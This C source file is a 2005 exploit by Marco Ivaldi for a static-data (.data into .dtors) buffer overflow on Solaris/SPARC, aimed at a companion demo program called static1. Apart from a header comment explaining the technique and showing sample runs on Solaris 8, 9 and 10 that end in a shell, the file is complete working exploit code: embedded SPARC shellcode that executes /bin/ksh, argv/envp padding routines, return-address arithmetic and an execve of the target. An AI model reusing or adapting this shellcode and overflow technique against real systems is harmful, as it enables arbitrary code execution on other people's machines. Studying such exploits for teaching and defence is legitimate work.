/*
 * $Id: static1-ex.c,v 1.1 2005/03/02 21:00:55 raptor Exp $
 *
 * static1-ex.c - static1.c exploit (Solaris/SPARC static data)
 * Copyright (c) 2005 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * "Overflows that occur in static data rather than on the heap or stack are
 * often more tricky to exploit. They must be evaluated on a case-by-case 
 * basis, and binaries must be examined in order to locate useful variables
 * near the target buffer in static memory. The organization of static vars
 * in a binary is not always made obvious by examining the source code, and
 * binary analysis is the only realiable and effective way to determine what
 * you're overflowing into." -- The Shellcoder's Handbook
 *
 * This program shows the exploitation of a buffer overflow that occurs truly
 * within the .data section and not within the .bss: we overflow past the
 * bounds of the buffer into the .dtors section where a stop function pointer
 * is located. Provided that no data was overwritten that caused the program
 * to crash before exit(), when the program exits the overwritten stop function
 * pointer will be called executing arbitrary code.
 *
 * I used a quick kludge to make the exploit compatible also with Solaris 10
 * (strangely enough, static data overflows on newer Solaris OSes seem to be
 * easier to exploit than on older boxes, since a pointer to a pointer to our
 * shellcode is no longer required). I've not investigated this behaviour 
 * thoroughly, so YMMV. Thanks to KF <dotslash@globalintersec.com> for giving 
 * me access to his Solaris 10 box.
 *
 * bash-2.05b$ readelf -s static1 | cut -d ":" -f 2 | sort | uniq
 *
 *     Value  Size Type    Bind   Vis      Ndx Name
 * [...]   
 *  000208e0   256 OBJECT  LOCAL  DEFAULT   16 buf.0
 *  000209e0     0 OBJECT  LOCAL  DEFAULT   16 force_to_data 
 *  000209e4     0 OBJECT  LOCAL  DEFAULT   17 __CTOR_LIST__
 *  000209e4     0 SECTION LOCAL  DEFAULT   17 
 *  000209e8     0 OBJECT  LOCAL  DEFAULT   17 __CTOR_END__
 *  000209ec     0 OBJECT  LOCAL  DEFAULT   18 __DTOR_LIST__
 *  000209ec     0 SECTION LOCAL  DEFAULT   18  
 *  000209f0     0 OBJECT  LOCAL  DEFAULT   18 __DTOR_END__ 
 *  [...]
 *
 * bash-2.03$ uname -a
 * SunOS merlino 5.8 Generic_108528-13 sun4u sparc SUNW,Ultra-5_10
 * bash-2.03$ ./static1-ex
 * Using SI_PLATFORM       : SUNW,Ultra-5_10 (5.8)
 * Using buffer size       : 277
 * Using stack base        : 0xffbefffc
 * Using ret address       : 0xffbeffa8
 * 
 * $ 
 * 
 * bash-2.05$ uname -a
 * SunOS morgana 5.9 Generic sun4u sparc SUNW,Ultra-5_10
 * bash-2.05$ ./static1-ex
 * Using SI_PLATFORM       : SUNW,Ultra-5_10 (5.9)
 * Using buffer size       : 277
 * Using stack base        : 0xffbffffc
 * Using ret address       : 0xffbfffa8
 * 
 * $ 
 *
 * bash-2.05b$ uname -a
 * SunOS ims0 5.10 s10_63 sun4u sparc SUNW,Ultra-4
 * bash-2.05b$ ./static1-ex
 * Using SI_PLATFORM       : SUNW,Ultra-4 (5.10)
 * Using buffer size       : 277
 * Using stack base        : 0xffbffffc
 * Using ret address       : 0xffbfffa8
 * 
 * $ 
 */

#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/systeminfo.h>

#define	VULN		"./static1"	// the vulnerable program
#define	BUFSIZE		277		// evil buffer size (256 + 20 + 1)

/* voodoo macros */
#define VOODOO32(_,__,___)	{_--;_+=(__+___-1)%4-_%4<0?8-_%4:4-_%4;}
#define VOODOO64(_,__,___)	{_+=7-(_+(__+___+1)*4+3)%8;}

char sc[] = /* Solaris/SPARC shellcode (48 + 4 = 52 bytes) */
"\x90\x90\x90\x90" // yeah, this is a nop-equivalent also on SPARC
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";

/* globals */
char	*arg[256];
int	arg_pos = 0, arg_len = 0;
char	*env[256];
int	env_pos = 0, env_len = 0;

/* prototypes */
int	add_arg(char *string);
int	add_env(char *string);
void	pad_arg(void);
void	set_val(char *buf, int pos, int val);

/*
 * main()
 */
int main(int argc, char **argv)
{
	char	buf[1024];
	char	platform[256], release[256];

	int	i, rel, offset, plat_len, prog_len, ret;
	int	size = BUFSIZE;

	int	sb = ((int)argv[0] | 0xffff) & 0xfffffffc;

	/* read command line */
	if (argc > 1) {
		size = atoi(argv[1]);
		size = (size / 4) * 4 + 1;
	}

	/* get some system information */
	sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
	sysinfo(SI_RELEASE, release, sizeof(release) - 1);
	rel = atoi(release + 2);

	/* prepare the evil buffer */
	memset(buf, 'A', size);
	buf[size - 1] = 0x0;

	/* add the arguments, pad argv and envp[0] */
	add_arg(buf);
	add_arg(NULL);
	pad_arg();

	/* put the shellcode in envp, keeping padding */
	add_env(sc);
	add_env(NULL);

	/* calculate the offset to argv[0] (voodoo magic) */
	plat_len = strlen(platform) + 1;
	prog_len = strlen(strrchr(VULN, '/') + 1) + 1;
	offset = arg_len + env_len + plat_len + prog_len;
	if (rel > 7)
		VOODOO64(offset, arg_pos, env_pos)
	else
		VOODOO32(offset, plat_len, prog_len)

	/* calculate the retaddr in envp[0] */
	ret = sb - offset + arg_len;

	/* fill the evil buffer */
	for (i = 0; i < size - 1; i += 4)
		set_val(buf, i, ret);

	/* Solaris 8/9 need a pointer to shellcode here */
	if (rel < 10)
		set_val(sc, 0, ret + 4);
	
	/* print some output */
	fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
	fprintf(stderr, "Using buffer size\t: %d\n", size);
	fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
	fprintf(stderr, "Using ret address\t: 0x%p\n\n", (void *)ret);

	/* run the vulnerable program */
	execve(VULN, arg, env);
	perror("execve");
	exit(0);
}

/*
 * add_arg(): add an argument to argv
 */
int add_arg(char * string)
{       
	/* null termination */
	if (!string) {
		arg[arg_pos] = NULL;
		return(arg_len);
	}

	/* take care of argv[0] padding */
	if (!arg_pos) {
		arg[arg_pos] = "AAA";
		arg_len += 4;
		arg_pos++;
	}

	/* actually add the argument to argv */
	arg[arg_pos] = string;
	arg_len += strlen(string) + 1;
	arg_pos++;

	return(arg_len);
}

/*
 * add_env(): add a variable to envp and pad if needed
 */
int add_env(char *string)
{
	int	i;

	/* null termination */
	if (!string) {
		env[env_pos] = NULL;
		return(env_len);
	}

	/* add the variable to envp */
	env[env_pos] = string;
	env_len += strlen(string) + 1;
	env_pos++;

	/* pad the envp using zeroes */
	if ((strlen(string) + 1) % 4)
		for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
			env[env_pos] = string + strlen(string);
			env_len++;
		}

	return(env_len);
}

/*
 * pad_arg(): pad argv using argv[0] and get a padded envp[0] too
 */
void pad_arg()
{
	int	pad;
	char	*arg0;

	/* already padded? */
	if (!(arg_len % 4))
		return;

	/* malloc() the right amount of space for padding */
	pad = 4 - (arg_len % 4);
	arg0 = (char *)malloc(pad + strlen(arg[0]) + 1);

	/* write the padding and terminate argv[0] */
	memset(arg0, 'A', (pad + strlen(arg[0]) + 1));
	arg0[(pad + strlen(arg[0]) + 1) - 1] = 0x0;

	/* use the new argv[0] */
	arg_len = arg_len - (strlen(arg[0]) + 1) + strlen(arg0) + 1;
	arg[0] = arg0;

	return;
}

/*
 * set_val(): copy a dword inside a buffer
 */
void set_val(char *buf, int pos, int val)
{
        buf[pos] =      (val & 0xff000000) >> 24;
        buf[pos + 1] =  (val & 0x00ff0000) >> 16;
        buf[pos + 2] =  (val & 0x0000ff00) >> 8;
        buf[pos + 3] =  (val & 0x000000ff);
}
